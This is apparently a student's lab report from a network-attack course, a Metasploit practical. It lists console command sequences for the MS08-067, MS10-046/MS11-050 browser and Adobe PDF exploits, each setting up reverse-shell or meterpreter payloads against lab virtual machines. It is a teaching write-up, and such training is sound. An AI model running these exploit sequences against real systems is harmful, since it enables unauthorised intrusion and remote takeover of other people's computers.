20155308『網絡對抗技術』Exp5 MSF基礎應用

20155308『網絡對抗技術』Exp5 MSF基礎應用

1、原理與實踐說明

實踐內容

本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:html

  • 一個主動攻擊實踐,如ms08-067; (1分)linux

  • 一個針對瀏覽器的攻擊,如ms11-050;(1分)shell

  • 一個針對客戶端的攻擊,如Adobe;(1分)windows

  • 成功應用任何一個輔助模塊。(0.5分)api

以上四個小實踐可不限於以上示例,並要求至少有一個是和其餘全部同窗不同的,不然扣除0.5分。瀏覽器

基礎問題回答

  • 用本身的話解釋什麼是exploit,payload,encode
  1. exploit:Exploit 的英文意思就是利用,它在黑客眼裏就是漏洞利用。有漏洞不必定就有Exploit(利用)。有Exploit就確定有漏洞。
  2. payload:病毒一般會作一些有害的或者惡性的動做。在病毒代碼中實現這個功能的部分叫作"有效負載"(payload)。payload能夠實現任何運行在受害者環境中的程序所能作的事情,而且可以執行動做包括破壞文件刪除文件,向病毒的做者或者任意的接收者發送敏感信息,以及提供通向被感染計算機的後門。
  3. encode:編碼,編製成計算機語言

實踐內容

目錄

  • 主動攻擊:ms08_067漏洞攻擊
  • 對瀏覽器攻擊:ms10_046漏洞攻擊
  • 對Adobe的漏洞攻擊:adobe_toolbutton
  • 嘗試利用漏洞對win7系統進行攻擊

Windows服務滲透攻擊——MS08-067安全漏洞

攻擊機:Kali(IP地址:192.168.91.135)安全

靶機: windows XP SP3(English)(IP地址:192.168.91.134)網絡


在攻擊機kali輸入msfconsole進入控制檯,依次輸入如下指令:tcp

  • msf > use exploit/windows/smb/ms08_067_netapi
  • msf exploit(windows/smb/ms08_067_netapi) > show payloads
  • msf exploit(windows/smb/ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回連
  • msf exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.91.135 //攻擊機ip
  • msf exploit(windows/smb/ms08_067_netapi) > set LPORT 5308 //攻擊端口
  • msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.91.134 //靶機ip,特定漏洞端口已經固定
  • msf exploit(windows/smb/ms08_067_netapi) > set target 0 //自動選擇目標系統類型,匹配度較高
  • msf exploit(windows/smb/ms08_067_netapi) > exploit //攻擊


  • 創建會話,攻擊成功結果以下:


針對瀏覽器的攻擊:ms11_050

攻擊機:kali (IP地址:192.168.91.135)學習

靶機:WindowsXP Professional sp2/Windows7專業版 (IP地址:192.168.91.136)


在攻擊機kali輸入msfconsole進入控制檯,依次輸入如下指令:

  • msf > use windows/browser/ms11_050_mshtml_cobjectelement

  • info指令查看該模塊的信息

  • targets信息

  • options信息

  • msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_tcp //http反向回連
  • msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.91.135 //攻擊機ip
  • msf exploit(ms11_050_cobjectelement) > set LPORT 5308 //攻擊端口固定
  • msf exploit(ms11_050_cobjectelement) > set URIPATH baidu //統一資源標識符路徑設置
  • set target 1
  • msf exploit(ms11_050_cobjectelement) > exploit

  • 攻擊成功後會有靶機須要訪問的網址

  • 可是不知道一直回連不成功,一直再試,也不知道爲啥??看了咱們小組長的博客,我學習了新的瀏覽器攻擊方式,見下面。

對瀏覽器攻擊:ms10_046漏洞攻擊


  • use exploit/windows/browser/ms10_046_shortcut_icon_dllloader使用該模塊,再使用
    show payloads
    查看能夠供咱們使用的payload

  • SRVHOST填的是本地監聽主機的IP地址,LHOST也是監聽的IP地址,因此這裏SRVHOST和LHOST都應該填攻擊機的IP地址:
  • 使用exploit指令執行漏洞,能夠看到生成了一個url:

  • 使用exploit指令執行漏洞,能夠看到生成了一個url:

  • 在MSF終端看見漏洞執行成功:

針對Adobe Reader軟件的滲透攻擊——adobe_toolbutton

攻擊機:kali

靶機:windowsXP Professional sp2

  • 在攻擊機kali輸入msfconsole進入控制檯,依次輸入如下指令:

  • 先用search adobe得知此漏洞所在的模塊

  • 選擇一個模塊


  • show targets查看能夠被攻擊的靶機的操做系統型號

  • msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回連
  • msf exploit(adobe_cooltype_sing) > set LHOST 192.168.91.135 //攻擊機ip
  • msf exploit(adobe_cooltype_sing) > set LPORT 5308//攻擊端口
  • msf exploit(adobe_cooltype_sing) > set FILENAME 5308hwf.pdf //設置生成pdf文件的名字
  • msf exploit(adobe_cooltype_sing) > exploit//攻擊

  • 找到5308hwf.pdf文件

  • 將文件放到靶機上

  • 在kali上進入監聽模塊,輸入如下命令:

  • msf > use exploit/multi/handler //進入監聽模塊
  • msf exploit(handler) > set payload windows/meterpreter/reverse_tcp//tcp反向鏈接
  • msf exploit(handler) > set LHOST 192.168.91.135 //攻擊機ip
  • msf exploit(handler) > set LPORT 5308 //攻擊端口固定
  • msf exploit(handler) > exploit

  • 發現已經獲取了被攻擊者權力,能夠對其進行操做

  • 若關閉pdf文件,則失去權限,攻擊失敗

成功應用任何一個輔助模塊

  • 輸入命令show auxiliary查看全部輔助模塊

  • 選擇其中一個便可

  • 用指令info查看相關信息

  • 進行掃描,結果以下圖所示

實驗中的問題

  • 我在進行kali機的IP地址的查詢時,正常的地址顯示是這樣的

  • 可是老是出現eth0消失的狀況:

  • 針對這個問題,我以前的解決辦法其一是關閉虛擬機,從新開一遍,地址就會正常了。其二就是從新安一下虛擬機,因此個人硬盤中虛擬機老是得備份。可是老是出現這個問題也不是辦法,我相信有的同窗也遇到過這個問題(不會只有我這麼慘吧???)

  • 解決:

通常是eth0被禁掉了,就只會顯示127.0.0.1這個迴環地址 你用
ifup eth0 ifconfig up eth0 上面兩個命令均可以,而後 /etc/init.d/network restart你就能看到eth0了。

  • 下面這篇博客是解釋「linux系統查看IP地址,不顯示IP地址或者只顯示127.0.0.1」緣由及解決過程,能夠參考一下。

https://blog.csdn.net/qq_36769100/article/details/71473632

實驗感想

本次實驗經過經過MSF的攻擊模塊對計算機進行各類攻擊方法的實踐,比前幾回的攻擊更加的系統化,同時攻擊的方法更加深刻。經過最後一個板塊的研究,使我將學習理論知識轉化爲自我實踐過程。

在其中某些模塊的學習中,老是會有攻擊不成功的地方,每當不成功,我就很懊惱,爲啥老是很別人的不同。可是在課上聽到老師說,攻擊不成功是很正常的事情,我忽然感受到了信心。而後經過查找學長學姐或是網上的解決方法,不斷解決問題,最後成功,感受頗有成就感。

相關文章
相關標籤/搜索